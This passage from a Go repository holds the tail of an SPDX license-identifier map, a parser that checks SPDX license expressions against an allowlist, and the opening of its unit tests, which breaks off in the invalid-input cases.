"bsd-2-clause-freebsd": true, "bsd-2-clause-netbsd": true, "bsd-2-clause-patent": true, "bsd-2-clause-pkgconf-disclaimer": true, "bsd-2-clause-views": true, "bsd-3-clause": true, "bsd-3-clause-acpica": true, "bsd-3-clause-attribution": true, "bsd-3-clause-clear": true, "bsd-3-clause-flex": true, "bsd-3-clause-hp": true, "bsd-3-clause-lbnl": true, 
"bsd-3-clause-modification": true, "bsd-3-clause-no-military-license": true, "bsd-3-clause-no-nuclear-license": true, "bsd-3-clause-no-nuclear-license-2014": true, "bsd-3-clause-no-nuclear-warranty": true, "bsd-3-clause-open-mpi": true, "bsd-3-clause-sun": true, "bsd-3-clause-tso": true, "bsd-4-clause": true, "bsd-4-clause-shortened": true, "bsd-4-clause-uc": true, "bsd-4.3reno": true, "bsd-4.3tahoe": true, "bsd-advertising-acknowledgement": true, "bsd-attribution-hpnd-disclaimer": true, "bsd-inferno-nettverk": true, "bsd-mark-modifications": true, "bsd-protection": true, "bsd-source-beginning-file": true, "bsd-source-code": true, "bsd-systemics": true, "bsd-systemics-w3works": true, "bsl-1.0": true, "buddy": true, "busl-1.1": true, "bzip2-1.0.5": true, "bzip2-1.0.6": true, "c-uda-1.0": true, "cal-1.0": true, "cal-1.0-combined-work-exception": true, "caldera": true, "caldera-no-preamble": true, "capec-tou": true, "catharon": true, "catosl-1.1": true, "cc-by-1.0": true, "cc-by-2.0": true, "cc-by-2.5": true, "cc-by-2.5-au": true, "cc-by-3.0": true, "cc-by-3.0-at": true, "cc-by-3.0-au": true, "cc-by-3.0-de": true, "cc-by-3.0-igo": true, "cc-by-3.0-nl": true, "cc-by-3.0-us": true, "cc-by-4.0": true, "cc-by-nc-1.0": true, "cc-by-nc-2.0": true, "cc-by-nc-2.5": true, "cc-by-nc-3.0": true, "cc-by-nc-3.0-de": true, "cc-by-nc-4.0": true, "cc-by-nc-nd-1.0": true, "cc-by-nc-nd-2.0": true, "cc-by-nc-nd-2.5": true, "cc-by-nc-nd-3.0": true, "cc-by-nc-nd-3.0-de": true, "cc-by-nc-nd-3.0-igo": true, "cc-by-nc-nd-4.0": true, "cc-by-nc-sa-1.0": true, "cc-by-nc-sa-2.0": true, "cc-by-nc-sa-2.0-de": true, "cc-by-nc-sa-2.0-fr": true, "cc-by-nc-sa-2.0-uk": true, "cc-by-nc-sa-2.5": true, "cc-by-nc-sa-3.0": true, "cc-by-nc-sa-3.0-de": true, "cc-by-nc-sa-3.0-igo": true, "cc-by-nc-sa-4.0": true, "cc-by-nd-1.0": true, "cc-by-nd-2.0": true, "cc-by-nd-2.5": true, "cc-by-nd-3.0": true, "cc-by-nd-3.0-de": true, "cc-by-nd-4.0": true, "cc-by-sa-1.0": true, "cc-by-sa-2.0": true, "cc-by-sa-2.0-uk": 
true, "cc-by-sa-2.1-jp": true, "cc-by-sa-2.5": true, "cc-by-sa-3.0": true, "cc-by-sa-3.0-at": true, "cc-by-sa-3.0-de": true, "cc-by-sa-3.0-igo": true, "cc-by-sa-4.0": true, "cc-pddc": true, "cc-pdm-1.0": true, "cc-sa-1.0": true, "cc0-1.0": true, "cddl-1.0": true, "cddl-1.1": true, "cdl-1.0": true, "cdla-permissive-1.0": true, "cdla-permissive-2.0": true, "cdla-sharing-1.0": true, "cecill-1.0": true, "cecill-1.1": true, "cecill-2.0": true, "cecill-2.1": true, "cecill-b": true, "cecill-c": true, "cern-ohl-1.1": true, "cern-ohl-1.2": true, "cern-ohl-p-2.0": true, "cern-ohl-s-2.0": true, "cern-ohl-w-2.0": true, "cfitsio": true, "check-cvs": true, "checkmk": true, "clartistic": true, "clips": true, "cmu-mach": true, "cmu-mach-nodoc": true, "cnri-jython": true, "cnri-python": true, "cnri-python-gpl-compatible": true, "coil-1.0": true, "community-spec-1.0": true, "condor-1.1": true, "copyleft-next-0.3.0": true, "copyleft-next-0.3.1": true, "cornell-lossless-jpeg": true, "cpal-1.0": true, "cpl-1.0": true, "cpol-1.02": true, "cronyx": true, "crossword": true, "cryptoswift": true, "crystalstacker": true, "cua-opl-1.0": true, "cube": true, "curl": true, "cve-tou": true, "d-fsl-1.0": true, "dec-3-clause": true, "diffmark": true, "dl-de-by-2.0": true, "dl-de-zero-2.0": true, "doc": true, "docbook-dtd": true, "docbook-schema": true, "docbook-stylesheet": true, "docbook-xml": true, "dotseqn": true, "drl-1.0": true, "drl-1.1": true, "dsdp": true, "dtoa": true, "dvipdfm": true, "ecl-1.0": true, "ecl-2.0": true, "ecos-2.0": true, "efl-1.0": true, "efl-2.0": true, "egenix": true, "elastic-2.0": true, "entessa": true, "epics": true, "epl-1.0": true, "epl-2.0": true, "erlpl-1.1": true, "esa-pl-permissive-2.4": true, "esa-pl-strong-copyleft-2.4": true, "esa-pl-weak-copyleft-2.4": true, "etalab-2.0": true, "eudatagrid": true, "eupl-1.0": true, "eupl-1.1": true, "eupl-1.2": true, "eurosym": true, "fair": true, "fbm": true, "fdk-aac": true, "ferguson-twofish": true, "frameworx-1.0": true, 
"freebsd-doc": true, "freeimage": true, "fsfap": true, "fsfap-no-warranty-disclaimer": true, "fsful": true, "fsfullr": true, "fsfullrsd": true, "fsfullrwd": true, "fsl-1.1-alv2": true, "fsl-1.1-mit": true, "ftl": true, "furuseth": true, "fwlw": true, "game-programming-gems": true, "gcr-docs": true, "gd": true, "generic-xts": true, "gfdl-1.1": true, "gfdl-1.1-invariants-only": true, "gfdl-1.1-invariants-or-later": true, "gfdl-1.1-no-invariants-only": true, "gfdl-1.1-no-invariants-or-later": true, "gfdl-1.1-only": true, "gfdl-1.1-or-later": true, "gfdl-1.2": true, "gfdl-1.2-invariants-only": true, "gfdl-1.2-invariants-or-later": true, "gfdl-1.2-no-invariants-only": true, "gfdl-1.2-no-invariants-or-later": true, "gfdl-1.2-only": true, "gfdl-1.2-or-later": true, "gfdl-1.3": true, "gfdl-1.3-invariants-only": true, "gfdl-1.3-invariants-or-later": true, "gfdl-1.3-no-invariants-only": true, "gfdl-1.3-no-invariants-or-later": true, "gfdl-1.3-only": true, "gfdl-1.3-or-later": true, "giftware": true, "gl2ps": true, "glide": true, "glulxe": true, "glwtpl": true, "gnuplot": true, "gpl-1.0": true, "gpl-1.0+": true, "gpl-1.0-only": true, "gpl-1.0-or-later": true, "gpl-2.0": true, "gpl-2.0+": true, "gpl-2.0-only": true, "gpl-2.0-or-later": true, "gpl-2.0-with-autoconf-exception": true, "gpl-2.0-with-bison-exception": true, "gpl-2.0-with-classpath-exception": true, "gpl-2.0-with-font-exception": true, "gpl-2.0-with-gcc-exception": true, "gpl-3.0": true, "gpl-3.0+": true, "gpl-3.0-only": true, "gpl-3.0-or-later": true, "gpl-3.0-with-autoconf-exception": true, "gpl-3.0-with-gcc-exception": true, "graphics-gems": true, "gsoap-1.3b": true, "gtkbook": true, "gutmann": true, "haskellreport": true, "hdf5": true, "hdparm": true, "hidapi": true, "hippocratic-2.1": true, "hp-1986": true, "hp-1989": true, "hpnd": true, "hpnd-dec": true, "hpnd-doc": true, "hpnd-doc-sell": true, "hpnd-export-us": true, "hpnd-export-us-acknowledgement": true, "hpnd-export-us-modify": true, "hpnd-export2-us": 
true, "hpnd-fenneberg-livingston": true, "hpnd-inria-imag": true, "hpnd-intel": true, "hpnd-kevlin-henney": true, "hpnd-markus-kuhn": true, "hpnd-merchantability-variant": true, "hpnd-mit-disclaimer": true, "hpnd-netrek": true, "hpnd-pbmplus": true, "hpnd-sell-mit-disclaimer-xserver": true, "hpnd-sell-regexpr": true, "hpnd-sell-variant": true, "hpnd-sell-variant-critical-systems": true, "hpnd-sell-variant-mit-disclaimer": true, "hpnd-sell-variant-mit-disclaimer-rev": true, "hpnd-smc": true, "hpnd-uc": true, "hpnd-uc-export-us": true, "htmltidy": true, "hyphen-bulgarian": true, "ibm-pibs": true, "icu": true, "iec-code-components-eula": true, "ijg": true, "ijg-short": true, "imagemagick": true, "imatix": true, "imlib2": true, "info-zip": true, "inner-net-2.0": true, "innosetup": true, "intel": true, "intel-acpi": true, "interbase-1.0": true, "ipa": true, "ipl-1.0": true, "isc": true, "isc-veillard": true, "iso-permission": true, "jam": true, "jasper-2.0": true, "jove": true, "jpl-image": true, "jpnic": true, "json": true, "kastrup": true, "kazlib": true, "knuth-ctan": true, "lal-1.2": true, "lal-1.3": true, "latex2e": true, "latex2e-translated-notice": true, "leptonica": true, "lgpl-2.0": true, "lgpl-2.0+": true, "lgpl-2.0-only": true, "lgpl-2.0-or-later": true, "lgpl-2.1": true, "lgpl-2.1+": true, "lgpl-2.1-only": true, "lgpl-2.1-or-later": true, "lgpl-3.0": true, "lgpl-3.0+": true, "lgpl-3.0-only": true, "lgpl-3.0-or-later": true, "lgpllr": true, "libpng": true, "libpng-1.6.35": true, "libpng-2.0": true, "libselinux-1.0": true, "libtiff": true, "libutil-david-nugent": true, "liliq-p-1.1": true, "liliq-r-1.1": true, "liliq-rplus-1.1": true, "linux-man-pages-1-para": true, "linux-man-pages-copyleft": true, "linux-man-pages-copyleft-2-para": true, "linux-man-pages-copyleft-var": true, "linux-openib": true, "loop": true, "lpd-document": true, "lpl-1.0": true, "lpl-1.02": true, "lppl-1.0": true, "lppl-1.1": true, "lppl-1.2": true, "lppl-1.3a": true, "lppl-1.3c": true, 
"lsof": true, "lucida-bitmap-fonts": true, "lzma-sdk-9.11-to-9.20": true, "lzma-sdk-9.22": true, "mackerras-3-clause": true, "mackerras-3-clause-acknowledgment": true, "magaz": true, "mailprio": true, "makeindex": true, "man2html": true, "martin-birgmeier": true, "mcphee-slideshow": true, "metamail": true, "minpack": true, "mips": true, "miros": true, "mit": true, "mit-0": true, "mit-advertising": true, "mit-click": true, "mit-cmu": true, "mit-enna": true, "mit-feh": true, "mit-festival": true, "mit-khronos-old": true, "mit-modern-variant": true, "mit-open-group": true, "mit-stk": true, "mit-testregex": true, "mit-wu": true, "mitnfa": true, "mmixware": true, "mmpl-1.0.1": true, "motosoto": true, "mpeg-ssg": true, "mpi-permissive": true, "mpich2": true, "mpl-1.0": true, "mpl-1.1": true, "mpl-2.0": true, "mpl-2.0-no-copyleft-exception": true, "mplus": true, "ms-lpl": true, "ms-pl": true, "ms-rl": true, "mtll": true, "mulanpsl-1.0": true, "mulanpsl-2.0": true, "multics": true, "mup": true, "naist-2003": true, "nasa-1.3": true, "naumen": true, "nbpl-1.0": true, "ncbi-pd": true, "ncgl-uk-2.0": true, "ncl": true, "ncsa": true, "net-snmp": true, "netcdf": true, "newsletr": true, "ngpl": true, "ngrep": true, "nicta-1.0": true, "nist-pd": true, "nist-pd-fallback": true, "nist-pd-tnt": true, "nist-software": true, "nlod-1.0": true, "nlod-2.0": true, "nlpl": true, "nokia": true, "nosl": true, "noweb": true, "npl-1.0": true, "npl-1.1": true, "nposl-3.0": true, "nrl": true, "ntia-pd": true, "ntp": true, "ntp-0": true, "nunit": true, "o-uda-1.0": true, "oar": true, "occt-pl": true, "oclc-2.0": true, "odbl-1.0": true, "odc-by-1.0": true, "offis": true, "ofl-1.0": true, "ofl-1.0-no-rfn": true, "ofl-1.0-rfn": true, "ofl-1.1": true, "ofl-1.1-no-rfn": true, "ofl-1.1-rfn": true, "ogc-1.0": true, "ogdl-taiwan-1.0": true, "ogl-canada-2.0": true, "ogl-uk-1.0": true, "ogl-uk-2.0": true, "ogl-uk-3.0": true, "ogtsl": true, "oldap-1.1": true, "oldap-1.2": true, "oldap-1.3": true, 
"oldap-1.4": true, "oldap-2.0": true, "oldap-2.0.1": true, "oldap-2.1": true, "oldap-2.2": true, "oldap-2.2.1": true, "oldap-2.2.2": true, "oldap-2.3": true, "oldap-2.4": true, "oldap-2.5": true, "oldap-2.6": true, "oldap-2.7": true, "oldap-2.8": true, "olfl-1.3": true, "oml": true, "openmdw-1.0": true, "openpbs-2.3": true, "openssl": true, "openssl-standalone": true, "openvision": true, "opl-1.0": true, "opl-uk-3.0": true, "opubl-1.0": true, "osc-1.0": true, "oset-pl-2.1": true, "osl-1.0": true, "osl-1.1": true, "osl-2.0": true, "osl-2.1": true, "osl-3.0": true, "ossp": true, "padl": true, "paratype-free-font-1.3": true, "parity-6.0.0": true, "parity-7.0.0": true, "pddl-1.0": true, "php-3.0": true, "php-3.01": true, "pixar": true, "pkgconf": true, "plexus": true, "pnmstitch": true, "polyform-noncommercial-1.0.0": true, "polyform-small-business-1.0.0": true, "postgresql": true, "ppl": true, "psf-2.0": true, "psfrag": true, "psutils": true, "python-2.0": true, "python-2.0.1": true, "python-ldap": true, "qhull": true, "qpl-1.0": true, "qpl-1.0-inria-2004": true, "radvd": true, "rdisc": true, "rhecos-1.1": true, "rpl-1.1": true, "rpl-1.5": true, "rpsl-1.0": true, "rsa-md": true, "rscpl": true, "ruby": true, "ruby-pty": true, "sax-pd": true, "sax-pd-2.0": true, "saxpath": true, "scea": true, "schemereport": true, "sendmail": true, "sendmail-8.23": true, "sendmail-open-source-1.1": true, "sgi-b-1.0": true, "sgi-b-1.1": true, "sgi-b-2.0": true, "sgi-opengl": true, "sgmlug-pm": true, "sgp4": true, "shl-0.5": true, "shl-0.51": true, "simpl-2.0": true, "sissl": true, "sissl-1.2": true, "sl": true, "sleepycat": true, "smail-gpl": true, "smlnj": true, "smppl": true, "snia": true, "snprintf": true, "sofa": true, "softsurfer": true, "soundex": true, "spencer-86": true, "spencer-94": true, "spencer-99": true, "spl-1.0": true, "ssh-keyscan": true, "ssh-openssh": true, "ssh-short": true, "ssleay-standalone": true, "sspl-1.0": true, "standardml-nj": true, "sugarcrm-1.1.3": true, 
"sul-1.0": true, "sun-ppp": true, "sun-ppp-2000": true, "sunpro": true, "swl": true, "swrule": true, "symlinks": true, "tapr-ohl-1.0": true, "tcl": true, "tcp-wrappers": true, "tekhvc": true, "termreadkey": true, "tgppl-1.0": true, "thirdeye": true, "threeparttable": true, "tmate": true, "torque-1.1": true, "tosl": true, "tpdl": true, "tpl-1.0": true, "trustedqsl": true, "ttwl": true, "ttyp0": true, "tu-berlin-1.0": true, "tu-berlin-2.0": true, "ubuntu-font-1.0": true, "ucar": true, "ucl-1.0": true, "ulem": true, "umich-merit": true, "unicode-3.0": true, "unicode-dfs-2015": true, "unicode-dfs-2016": true, "unicode-tou": true, "unixcrypt": true, "unlicense": true, "unlicense-libtelnet": true, "unlicense-libwhirlpool": true, "unrar": true, "upl-1.0": true, "urt-rle": true, "vim": true, "vixie-cron": true, "vostrom": true, "vsl-1.0": true, "w3c": true, "w3c-19980720": true, "w3c-20150513": true, "w3m": true, "watcom-1.0": true, "widget-workshop": true, "wordnet": true, "wsuipa": true, "wtfnmfpl": true, "wtfpl": true, "wwl": true, "wxwindows": true, "x11": true, "x11-distribute-modifications-variant": true, "x11-no-permit-persons": true, "x11-swapped": true, "xdebug-1.03": true, "xerox": true, "xfig": true, "xfree86-1.1": true, "xinetd": true, "xkeyboard-config-zinoviev": true, "xlock": true, "xnet": true, "xpp": true, "xskat": true, "xzoom": true, "ypl-1.0": true, "ypl-1.1": true, "zed": true, "zeeff": true, "zend-2.0": true, "zimbra-1.3": true, "zimbra-1.4": true, "zlib": true, "zlib-acknowledgement": true, "zpl-1.1": true, "zpl-2.0": true, "zpl-2.1": true, } ================================================ FILE: internal/spdx/satisfies.go ================================================ // Package spdx provides functionality for parsing and evaluating SPDX license expressions. 
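package spdx

import (
	"errors"
	"fmt"
	"slices"
	"strings"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// node is one element of a parsed license expression tree.
type node interface {
	// satisfiedBy checks if the given licenses satisfy the license expression represented by this node
	satisfiedBy(licenses []string) bool
}

// nodeBranch represents a node in the tree that has two children, which should be
// evaluated with the operator to determine if the license expression is satisfied
type nodeBranch struct {
	left     node
	operator string
	right    node
}

// satisfiedBy evaluates both children against licenses and combines the results
// with the branch operator. Any operator other than "AND" or "OR" yields false,
// so an unrecognised operator never counts as satisfied.
func (n nodeBranch) satisfiedBy(licenses []string) bool {
	switch n.operator {
	case "AND":
		return n.left.satisfiedBy(licenses) && n.right.satisfiedBy(licenses)
	case "OR":
		return n.left.satisfiedBy(licenses) || n.right.satisfiedBy(licenses)
	}

	return false
}

var _ node = nodeBranch{}

// nodeLeaf represents a leaf node in the tree, which holds a single license id
type nodeLeaf struct {
	value string
}

// satisfiedBy reports whether any entry of licenses equals the leaf's license id,
// comparing the lower-cased forms of both strings.
func (n nodeLeaf) satisfiedBy(licenses []string) bool {
	v := strings.ToLower(n.value)

	return slices.ContainsFunc(licenses, func(l string) bool {
		return v == strings.ToLower(l)
	})
}

var _ node = nodeLeaf{}

// tokens is the queue of not-yet-consumed tokens of a license expression.
type tokens struct {
	tokens []string
}

// peek returns the next token in the list of tokens, or otherwise an empty string
func (ts *tokens) peek() string {
	if len(ts.tokens) == 0 {
		return ""
	}

	return ts.tokens[0]
}

// next returns the next token in the list of tokens, removing it from the list in the process.
//
// Like peek, it returns an empty string when no tokens are left; previously it
// indexed the empty slice and panicked.
func (ts *tokens) next() string {
	if len(ts.tokens) == 0 {
		return ""
	}

	token := ts.tokens[0]
	ts.tokens = ts.tokens[1:]

	return token
}

// allowed represents the tokens that are allowed to come after a particular token
var allowed = map[string][]string{
	"WITH": {"EXP"},
	"AND":  {"EXP", "("},
	"OR":   {"EXP", "("},
	"(":    {"EXP", "("},
	")":    {")", "AND", "OR", "END"},
	"EXP":  {"WITH", "AND", "OR", ")", "END"},
	"END":  {},
}

// nextAndIsNextNextValid returns both the next token, and checks if the token after that one is valid.
//
// An exhausted token list (for example an empty or whitespace-only license
// expression) is reported as an error rather than consumed: the expression
// text is presumably taken from package metadata, so malformed input must not
// be able to crash the parser.
func (ts *tokens) nextAndIsNextNextValid() (string, error) {
	if len(ts.tokens) == 0 {
		return "", errors.New("unexpected end of license expression")
	}

	next := ts.next()

	return next, ts.isNextValid(next)
}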
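// isNextValid checks if the next token is valid to come after the given current token
func (ts *tokens) isNextValid(cur string) error {
	allowedNext := allowed[cur]

	// license expressions are implied as being not one of the other tokens
	if allowedNext == nil {
		cur = "EXP"
		allowedNext = allowed[cur]
	}

	next := "END"

	if len(ts.tokens) > 0 {
		next = ts.peek()
	}

	// license expressions are implied as being not one of the other tokens
	if _, ok := allowed[next]; !ok {
		next = "EXP"
	}

	if slices.Contains(allowedNext, next) {
		return nil
	}

	return fmt.Errorf("unexpected %s after %s", next, cur)
}

// tokenise breaks down the given spdx license expression into tokens.
//
// Only the space character separates tokens; brackets are tokens of their own,
// and every other character becomes part of the token being accumulated.
func tokenise(license models.License) tokens {
	var ts tokens

	current := ""

	for _, c := range string(license) {
		switch c {
		case '(', ')', ' ':
			// check if we've been accumulating a token, before processing the current character
			if current != "" {
				ts.tokens = append(ts.tokens, current)
			}

			current = ""

			// spaces are only used to separate tokens, but are not tokens themselves
			if c != ' ' {
				ts.tokens = append(ts.tokens, string(c))
			}
		default:
			current += string(c)
		}
	}

	// before returning, make sure we add the last token we were accumulating
	if current != "" {
		ts.tokens = append(ts.tokens, current)
	}

	return ts
}

// parse constructs an ast tree from the given tokens.
//
// Every token must be consumed by the tree: parseOr stops at the first token
// that cannot continue the expression, such as an unpaired ")", and evaluating
// only what came before it would silently ignore the rest of the expression
// when it is checked against an allowlist.
func parse(tokens *tokens) (node, error) {
	root, err := parseOr(tokens)

	if err != nil {
		return nil, err
	}

	if len(tokens.tokens) > 0 {
		return nil, fmt.Errorf("unexpected %s after end of expression", tokens.peek())
	}

	return root, nil
}

// parseOr parses a sequence of one or more "AND" groups joined by "OR", which
// makes "OR" bind less tightly than "AND"
func parseOr(tokens *tokens) (node, error) {
	left, err := parseAnd(tokens)

	if err != nil {
		return nil, err
	}

	for tokens.peek() == "OR" {
		operator, err := tokens.nextAndIsNextNextValid()

		if err != nil {
			return nil, err
		}

		right, err := parseAnd(tokens)

		if err != nil {
			return nil, err
		}

		left = nodeBranch{
			left:     left,
			operator: operator,
			right:    right,
		}
	}

	return left, nil
}

// parseAnd parses a sequence of one or more expressions joined by "AND"
func parseAnd(tokens *tokens) (node, error) {
	left, err := parseExpression(tokens)

	if err != nil {
		return nil, err
	}

	for tokens.peek() == "AND" {
		operator, err := tokens.nextAndIsNextNextValid()

		if err != nil {
			return nil, err
		}

		right, err := parseExpression(tokens)

		if err != nil {
			return nil, err
		}

		left = nodeBranch{
			left:     left,
			operator: operator,
			right:    right,
		}
	}

	return left, nil
}

// parseExpression parses either a bracketed sub-expression or a single
// license, including its "WITH" exception when one follows
func parseExpression(tokens *tokens) (node, error) {
	next, err := tokens.nextAndIsNextNextValid()

	if err != nil {
		return nil, err
	}

	// every other call site has already checked that a license or "(" comes
	// next, so a closing bracket can only show up here as the very first token
	if next == ")" {
		return nil, errors.New("unexpected ) at start of expression")
	}

	if next == "(" {
		expr, err := parseOr(tokens)

		if err != nil {
			return nil, err
		}

		if tokens.peek() != ")" {
			return nil, errors.New("missing closing bracket")
		}

		_, err = tokens.nextAndIsNextNextValid()

		if err != nil {
			return nil, err
		}

		return expr, nil
	}

	// currently WITH expressions are just treated as part of the license
	if tokens.peek() == "WITH" {
		nex2, err := tokens.nextAndIsNextNextValid()

		if err != nil {
			return nil, err
		}

		// the token following the exception is not validated here, it is left
		// for the caller to either continue the expression with or to reject
		next += " " + nex2 + " " + tokens.next()
	}

	return nodeLeaf{value: next}, nil
}

// Satisfies checks if the given license expression is satisfied by the allowed licenses.
//
// An error is returned, along with false, for an expression that cannot be
// parsed in full. That includes an expression that is empty or made up of
// spaces only, which used to panic, and one with tokens left over after a
// complete expression, which used to be evaluated as if they were not there.
func Satisfies(license models.License, allowlist []string) (bool, error) {
	tokens := tokenise(license)

	if len(tokens.tokens) == 0 {
		return false, errors.New("empty license expression")
	}

	nod, err := parse(&tokens)

	if err != nil {
		return false, err
	}

	return nod.satisfiedBy(allowlist), nil
}

================================================
FILE: internal/spdx/satisfies_test.go
================================================
package spdx_test

import (
	"strings"
	"testing"

	"github.com/google/osv-scanner/v2/internal/spdx"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// namer builds the name of the subtest for a license expression and one variant of licenses
func namer(t *testing.T, license models.License, licenses []string, expected bool) string {
	t.Helper()

	name := string(license) + " is"

	if !expected {
		name += " not"
	}

	return name + " satisfied by " + strings.Join(licenses, ", ")
}

func TestSatisfies(t *testing.T) {
	t.Parallel()

	tests := []struct {
		license models.License
		pass    [][]string
		fail    [][]string
	}{
		// simple
		{
			license: "MIT",
			pass:    [][]string{{"MIT"}, {"MIT", "Apache-2.0"}},
			fail:    [][]string{{"Apache-2.0"}},
		},
		{
			license: "Apache-2.0",
			pass:    [][]string{{"Apache-2.0"}, {"MIT", "Apache-2.0"}},
			fail:    [][]string{{"MIT"}},
		},
		// WITH expressions (ignored)
		{
			license: "GPL-2.0-or-later WITH Bison-exception-2.2",
			pass: [][]string{
				{"GPL-2.0-or-later WITH Bison-exception-2.2"},
			},
			fail: [][]string{
				{"Bison-exception-2.2"},
				{"GPL-2.0-or-later"},
				{"GPL-2.0-or-later", "Bison-exception-2.2"},
				{"GPL-1.0"},
			},
		},
		// OR expressions
		{
			license: "MIT OR Apache-2.0",
			pass: [][]string{
				{"MIT"},
				{"Apache-2.0"},
				{"Apache-2.0", "MIT"},
				{"Apache-1.0", "MIT"},
			},
			fail: [][]string{
				{"Apache-1.0"},
			},
		},
		{
			license: "LGPL-2.1-only OR MIT OR BSD-3-Clause",
			pass: [][]string{
				{"LGPL-2.1-only"},
				{"MIT"},
				{"BSD-3-Clause"},
				{"Apache-2.0", "MIT"},
				{"LGPL-2.1-only", "MIT", "BSD-3-Clause"},
				{"LGPL-2.1-only", "BSD-3-Clause"},
			},
			fail: [][]string{
				{"Apache-2.0"},
			},
		},
		// AND expressions
		{
			license: "MIT AND Apache-2.0",
			pass: [][]string{
				{"Apache-2.0", "MIT"},
				{"Apache-2.0", "Apache-1.0", "MIT"},
			},
			fail: [][]string{
				{"MIT"},
				{"Apache-2.0"},
				{"Apache-1.0"},
				{"Apache-1.0", "MIT"},
			},
		},
		// AND & OR expressions
		{
			license: "LGPL-2.1-only OR BSD-3-Clause AND MIT",
			pass: [][]string{
				{"LGPL-2.1-only"},
				{"BSD-3-Clause", "MIT"},
				{"LGPL-2.1-only", "BSD-3-Clause", "MIT"},
				{"LGPL-2.1-only", "BSD-3-Clause"},
				{"LGPL-2.1-only", "MIT"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"BSD-3-Clause"},
				{"MIT"},
			},
		},
		{
			license: "MIT AND LGPL-2.1-only OR BSD-3-Clause",
			pass: [][]string{
				{"BSD-3-Clause"},
				{"BSD-3-Clause", "MIT"},
				{"LGPL-2.1-only", "BSD-3-Clause", "MIT"},
				{"LGPL-2.1-only", "BSD-3-Clause"},
				{"LGPL-2.1-only", "MIT"},
				{"MIT", "LGPL-2.1-only"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"LGPL-2.1-only"},
				{"MIT"},
			},
		},
		{
			license: "A OR B AND C OR D",
			pass: [][]string{
				{"A"},
				{"B", "C"},
				{"D"},
				{"A", "B", "C"},
				{"B", "C", "D"},
				{"A", "D"},
				{"A", "B", "C", "D"},
			},
			fail: [][]string{
				{"B"},
				{"C"},
				{"E"},
			},
		},
		{
			license: "MIT AND LGPL-2.1-or-later OR BSD-3-Clause",
			pass: [][]string{
				{"BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later"},
				{"MIT", "BSD-3-Clause"},
				{"LGPL-2.1-or-later", "BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"MIT"},
				{"LGPL-2.1-or-later"},
			},
		},
		{
			license: "BSD-3-Clause OR MIT AND LGPL-2.1-or-later",
			pass: [][]string{
				{"BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later"},
				{"MIT", "BSD-3-Clause"},
				{"LGPL-2.1-or-later", "BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"MIT"},
				{"LGPL-2.1-or-later"},
			},
		},
		// parentheses
		{
			license: "MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)",
			pass: [][]string{
				{"MIT", "LGPL-2.1-or-later"},
				{"MIT", "BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"MIT"},
				{"LGPL-2.1-or-later"},
				{"BSD-3-Clause"},
				{"LGPL-2.1-or-later", "BSD-3-Clause"},
			},
		},
		{
			license: "(BSD-3-Clause OR LGPL-2.1-or-later) AND MIT",
			pass: [][]string{
				{"MIT", "LGPL-2.1-or-later"},
				{"MIT", "BSD-3-Clause"},
				{"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"},
			},
			fail: [][]string{
				{"Apache-2.0"},
				{"MIT"},
				{"LGPL-2.1-or-later"},
				{"BSD-3-Clause"},
				{"LGPL-2.1-or-later", "BSD-3-Clause"},
			},
		},
		{
			license: "(A OR B) AND (C OR D)",
			pass: [][]string{
				{"A", "C"},
				{"A", "D"},
				{"B", "C"},
				{"B", "D"},
				{"A", "C", "D"},
				{"B", "C", "D"},
				{"A", "B", "C"},
				{"A", "B", "D"},
				{"A", "B", "C", "D"},
			},
			fail: [][]string{
				{"A"},
				{"B"},
				{"C"},
				{"D"},
				{"A", "B"},
				{"C", "D"},
				{"E"},
			},
		},
		{
			license: "A AND (B OR C AND D)",
			pass: [][]string{
				{"A", "B"},
				{"A", "C", "D"},
				{"A", "B", "C", "D"},
			},
			fail: [][]string{
				{"A"},
				{"B"},
				{"C"},
				{"D"},
				{"A", "C"},
				{"A", "D"},
				{"C", "D"},
				{"B", "C", "D"},
				{"E"},
			},
		},
		{
			license: "A AND ((B OR C) AND D)",
			pass: [][]string{
				{"A", "B", "D"},
				{"A", "C", "D"},
				{"A", "B", "C", "D"},
			},
			fail: [][]string{
				{"A"},
				{"B"},
				{"C"},
				{"D"},
				{"A", "B"},
				{"A", "C"},
				{"A", "D"},
				{"C", "D"},
				{"B", "C", "D"},
				{"E"},
			},
		},
		{
			license: "A AND B AND C OR D AND E OR F",
			pass: [][]string{
				{"A", "B", "C", "D", "E", "F"},
				{"A", "B", "C", "D", "E"},
				{"A", "B", "C"},
				{"D", "E"},
				{"F"},
			},
			fail: [][]string{
				{"A"},
				{"B"},
				{"C"},
				{"D"},
				{"E"},
				{"A", "C"},
				{"A", "D"},
				{"A", "E"},
				{"B", "C"},
				{"B", "D"},
				{"B", "E"},
				{"C", "C"},
				{"C", "D"},
				{"C", "E"},
			},
		},
	}
	for _, tt := range tests {
		for _, variant := range tt.pass {
			t.Run(namer(t, tt.license, variant, true), func(t *testing.T) {
				t.Parallel()

				got, err := spdx.Satisfies(tt.license, variant)

				if err != nil {
					t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, nil)
				}

				if !got {
					t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, true)
				}
			})
		}

		for _, variant := range tt.fail {
			t.Run(namer(t, tt.license, variant, false), func(t *testing.T) {
				t.Parallel()

				got, err := spdx.Satisfies(tt.license, variant)

				if err != nil {
					t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, nil)
				}

				if got {
					t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, false)
				}
			})
		}
	}
}

func TestSatisfies_Invalid(t *testing.T) {
	t.Parallel()

	tests := []struct {
		license models.License
		wantErr string
	}{
		// expressions must hold at least one token
		{"", "empty license expression"},
		{" ", "empty license expression"},

		// every token must be part of the expression
		{")", "unexpected ) at start of expression"},
		{"A)", "unexpected ) after end of expression"},
		{"(A))", "unexpected ) after end of expression"},
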